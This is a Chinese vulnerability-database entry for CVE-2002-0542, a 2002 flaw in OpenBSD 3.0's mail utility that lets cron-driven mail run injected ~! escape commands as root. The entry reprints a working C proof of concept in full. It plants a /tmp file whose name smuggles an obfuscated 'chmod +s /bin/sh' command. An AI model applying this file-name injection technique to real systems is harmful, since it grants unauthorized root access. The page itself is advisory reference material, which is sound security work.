OpenBSD的mail存在执行任意命令的漏洞-安全小百科

OpenBSD的mail存在执行任意命令的漏洞

漏洞ID	1106669	漏洞类型	未知
发布时间	2002-04-11	更新时间	2005-05-02
CVE编号	CVE-2002-0542	CNNVD-ID	CNNVD-200207-025
漏洞平台	OpenBSD	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/21373
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200207-025

|漏洞详情

OpenBSD系统中的/usr/bin/mail是一款简单的邮件用户代理程序，也可以用于批处理模式，如运行CRON任务发送邮件给管理员。OpenBSD系统中的/usr/bin/mail在处理转义序列(~!command)不正确，可导致攻击者以运行mail的用户权限执行任意命令。当运行在非交互模式时程序/usr/bin/mail接收转义序列，当攻击者把转义序列插入到作为输入的流中传递给MAIL命令时，此转义序列就会被mail命令解析，导致可以以运行mail命令的用户权限执行任意命令或者读/写任意文件到系统上。因为当运行CRON任务时/etc/daily脚本输出管道方式传送给/usr/bin/mail就可能导致用户获得ROOT权限。

|漏洞EXP

/*
source: http://www.securityfocus.com/bid/4495/info

OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.

The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.

If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included in the emails. 
*/

/*
 * (c) 2002 [email protected]
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to [email protected] for discovering vulnerability.
 *
 */

#include <fcntl.h>

int main(void)
{
        int fd;

        chdir("/tmp");
        fd = open("n~!chmod +s `perl -e 'print "\057\142\151\156\057\163\150"'`n", O_CREAT|O_WRONLY, 04777);

        if (fd)
                close(fd);
}

|参考资料

来源:BID
名称:4495
链接:http://www.securityfocus.com/bid/4495
来源:XF
名称:openbsd-mail-root-privileges(8818)
链接:http://www.iss.net/security_center/static/8818.php
来源:BUGTRAQ
名称:20020411OpenBSDLocalRootCompromise
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101855467811695&w;=2
来源:www.openbsd.org
链接:http://www.openbsd.org/errata30.html#mail
来源:BUGTRAQ
名称:20020411localrootcompromiseinopenbsd3.0andbelow
链接:http://online.securityfocus.com/archive/1/267089
来源:OSVDB
名称:5269
链接:http://www.osvdb.org/5269

相关推荐: Opera Web Browser 7.x – URI Handler Directory Traversal

Opera Web Browser 7.x – URI Handler Directory Traversal 漏洞ID 1054251 漏洞类型发布时间 2003-11-12 更新时间 2003-11-12 CVE编号 N/A CNNVD-ID N/A 漏…

文章版权归作者所有，未经允许请勿转载。

THE END